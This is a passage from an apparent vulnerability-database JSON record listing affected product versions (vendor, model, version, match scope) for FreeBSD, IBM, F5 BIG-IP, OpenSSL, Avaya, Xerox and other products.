"scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "9.2-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "cms r17", "scope": null, "trust": 0.3, "vendor": "avaya", "version": null }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.0" }, { "model": "7.3-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "sdk for node.js", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.7" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7" }, { "model": "6.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "oncommand workflow automation", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "oncommand unified manager core package 5.2.1p1", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "89000" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.0" }, { "model": "8.4-release-p11", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "7.4-release-p12", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.1" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "alpha", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.0" }, { "model": "security network intrusion prevention system gx6116", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip edge gateway hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.1" }, { "model": "8.3-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2202585" }, { "model": "-release-p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.7" }, { "model": "10.0-release-p5", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "9.1-release-p7", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "tivoli workload scheduler for applications fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.1.1" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "9.1-release-p17", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.21" }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "75250" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.2" }, { "model": "open systems snapvault 3.0.1p6", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.2" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2" }, { "model": "big-ip wom hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.5" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7525061.121.225.06100" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.1" }, { "model": "hp-ux b.11.11", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "-release-p1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "9.3-beta1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7835072.010.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.3" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "linux", "scope": "eq", "trust": 0.3, "vendor": "slackware", "version": "14.1" }, { "model": "security network intrusion prevention system gx5208-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "8-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2227916" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.0" }, { "model": "-release-p6", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.3" }, { "model": "8.4-rc1-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "-release-p5", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.1" }, { "model": "8.1-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.4" }, { "model": "8.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1" }, { "model": "7.1-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.4" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0" }, { "model": "-stablepre050201", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "8.4-release-p14", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-release-p9", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.2-" }, { "model": "project openssl 0.9.8l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip wom hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "9.1-release-p18", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics 11.0.0-hf2", "scope": null, "trust": 0.3, "vendor": "f5", "version": null }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.2" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "flex system fc3171 8gb san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "10.0-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.20" }, { "model": "7.3-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.1i", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0n", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.4x" }, { "model": "image construction and composition tool", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.3" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.1" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.0.x" }, { "model": "big-ip asm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "project openssl i", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.4" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "7.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.3" }, { "model": "project openssl 1.0.0i", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.0" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "10.0-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "hp-ux b.11.11 (11i", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "v1)" }, { "model": "tivoli netcool system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "10" }, { "model": "hp-ux b.11.23", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.7" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.3" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.0.4" }, { "model": "6.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x8804259" }, { "model": "10.0-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip edge gateway hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "i v5r4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.1-release-p15", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ssl for openvms", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "1.4-493" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "51005.1.21" }, { "model": "-release", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "9.3" }, { "model": "tssc", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "7.0-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.1.5.1" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.4" }, { "model": "tivoli workload scheduler for applications", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x37508752" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5.1" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "8700072.161.134.32804" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2.3" }, { "model": "8.2-release-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.1" }, { "model": "snapdrive for windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.3" }, { "model": "big-ip psm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "security network intrusion prevention system gx5008-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "i v5r3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "9.3-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "8.3-release-p6", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7800", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "6.4-release-p4", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412-10", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "9.2-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1x8664" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.5x" }, { "model": "8.4-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3" }, { "model": "project openssl c", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "-release-p7", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.8" }, { "model": "-release-p32", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.10" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "7.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x36307158" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "5745061.132.224.35203" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8x" }, { "model": "campaign", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.4" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.01" }, { "model": "upward integration modules hardware management pack", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "41005.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "upward integration modules integrated installer", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7830072.010.134.32804" }, { "model": "-stable", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.2" }, { "model": "-release-p20", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.11" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.3" }, { "model": "security network intrusion prevention system gx4004", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "10.0-release-p8", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.1" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "93020" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "security network intrusion prevention system gx5108-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "8.1-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx5008", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.2" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.6" }, { "model": "bladecenter advanced management module 3.66g", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "8.4-rc2-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "58550" }, { "model": "contact optimization", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.4" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "8900072.161.134.32804" }, { "model": "9.3-rc2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "3.1x" }, { "model": "9.3-rc3-p1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "flex system compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x2408737" }, { "model": "9.0--releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "9.2-rc1", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "security network intrusion prevention system gx4002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.1" }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.3.2" }, { "model": "7.4-release-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "6.0.x" }, { "model": "colorqube r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "9302072.180.134.32804" }, { "model": "9.0-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx7412", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "ip office application server sp", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.02" }, { "model": "-releng", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.6.0" }, { "model": "rc1", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.1" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "workcentre r14-11 spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "3655072.060.134.32804" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.2" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "release -p3", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2-" }, { "model": "8.4-stable", "scope": "ne", "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "8.1-prerelease", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57550" }, { "model": "linux lts", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "14.04" }, { "model": "9.3-rc1-p2", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "security network intrusion prevention system gx3002", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6" }, { "model": "tivoli netcool system service monitor fp14", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "security network intrusion prevention system gx7412-05", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.3" }, { "model": "project openssl 1.0.0f", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux lts i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "12.04" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "2.2x" }, { "model": "tivoli management framework", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.1" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "1.0" }, { "model": "9.2-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "scale out network attached storage", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2.0" }, { "model": "sdk for node.js", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1" }, { "model": "snapdrive for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "security network intrusion prevention system gx5208", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.0.12" }, { "model": "security network intrusion prevention system gx4004-v2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "project openssl 1.0.0j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.1.1" }, { "model": "security network intrusion prevention system gv1000", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.5" }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.10" }, { "model": "8-releng", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura experience portal sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "-prerelease", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.4" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "proventia network security controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.1209" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "4.6" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "5.3" }, { "model": "7.3-release-p3", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "ssl for openvms", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.4-471" }, { "model": "8.2-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "system m4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x32502583" }, { "model": "9.2-release-p9", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "enterprise linux server aus", 